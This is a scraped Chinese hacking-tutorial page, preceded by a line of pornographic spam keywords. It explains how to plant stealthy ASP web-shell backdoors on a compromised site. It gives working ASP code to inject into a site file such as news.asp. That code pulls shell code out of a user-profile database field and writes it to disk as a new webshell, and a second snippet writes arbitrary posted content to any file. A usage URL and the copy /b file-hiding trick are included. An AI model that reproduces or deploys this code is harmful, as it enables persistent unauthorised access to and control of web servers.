亚洲免费人人妻人人,cao78在线视频,福建一级毛片,91精品视频免费观看,高清另类图片操逼,日本特黄特色大片免费看,超碰欧美人人澡曰曰澡夜夜泛

巧用.mdb后綴數(shù)據(jù)庫做后門 -電腦資料

電腦資料 時間:2019-01-01 我要投稿
【www.msguai.com - 電腦資料】

    我不否認(rèn)n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法,其實不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦

    copy 文件名/參數(shù) + 文件名/參數(shù) 生成文件名

    這樣的方法可以很靈活的運用來達到隱藏文件的目的,具體的參數(shù)就是/a以acsic碼方式,/b二進制方式,就不羅嗦這些了,至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍,

巧用.mdb后綴數(shù)據(jù)庫做后門

。今天要講的是如何把后門放到后綴。mdb的數(shù)據(jù)庫中,前提是在我們拿到

    一個webshell之后…

    我們所知道的,很多站點在用戶注冊的時候要讓填好多東西例如:

    用戶名、密碼、qq、郵箱、個人簡介、電話、聯(lián)系方式、住址一類的

    而對應(yīng)到數(shù)據(jù)庫中也都會有相應(yīng)的表 字段 值

    我今天要做的就是 我注冊一個用戶在 我的個人簡介的地方上寫入shell代碼,然后修改他站點上的一個文件,使用的時候觸發(fā)這個文件,就把我個人簡歷中的shell代碼,備份到當(dāng)前目錄下

    廢話少說了 大家看代碼

    <%

    if request(“action”)=“firefox” then

    fname=request.querystring(“fn”)

    tname=request.querystring(“tn”)

    bname=request.querystring(“bn”)

    id=request.querystring(“id”)

    idvalue=request.querystring(“idv”)

    set rs=server.createobject(“ADODB.recordset”)

    sql=“select ”& bname & “ from ”&tname& “ where ”&id&“=”&idvalue&“”“”

    rs.open sql,conn,1,3

    if not rs.eof then

    content=rs(bname)

    else

    response.write “Nothing”

    end if

    set fso=Server.CreateObject(“Scripting.FileSystemObject”)

    set txtfile=fso.createtextfile(server.mappath(fname))

    txtfile.writeline(content)

    txtfile.close

    end if

    %>

    將上邊的代碼加到站點的一個文件中 如news.asp

    根據(jù)我們了解的信息 在其站點注冊后 下載數(shù)據(jù)庫看結(jié)構(gòu)

    我注冊的firefox名字是在 user表 其id值為119 用于存放我注冊簡歷的表字段為jl

    那么在使用的時候我們

    news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

    就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell

    以上可以說是萬千隱藏方法中的一種 下邊再說另外一種更方便的隱藏方法

    這個方法就和mdb后綴無關(guān)系了

    同樣我們還是修改news.asp 將以下代碼插入到對方news.asp中

    <%

    if request(“action”)=“firefox” then

    n=request.form(“n”)

    c=request.form(“c”)

    set fso=Server.CreateObject(“Scripting.FileSystemObject”)

    set txtfile=fso.createtextfile(server.mappath(n))

    txtfile.writeline(c)

    txtfile.close

    end if

    %>

    這段代碼相對簡單些 算是一個木馬的服務(wù)端吧,

電腦資料

巧用.mdb后綴數(shù)據(jù)庫做后門》(http://www.msguai.com)。引言:好長時間了,從剛開始的站點管理器到現(xiàn)在流行的幾款asp后門,相信大多網(wǎng)管都能說出這些經(jīng)典webshell的名字,如海洋、老兵、藍屏等,也相信大多數(shù)的網(wǎng)管學(xué)會了關(guān)鍵字的搜索方法來搜索這些木馬,當(dāng)然現(xiàn)在的時間如果再象隱藏后門就要講些技巧啦,俗話說的好“佛高一尺,我高一丈”。

最新文章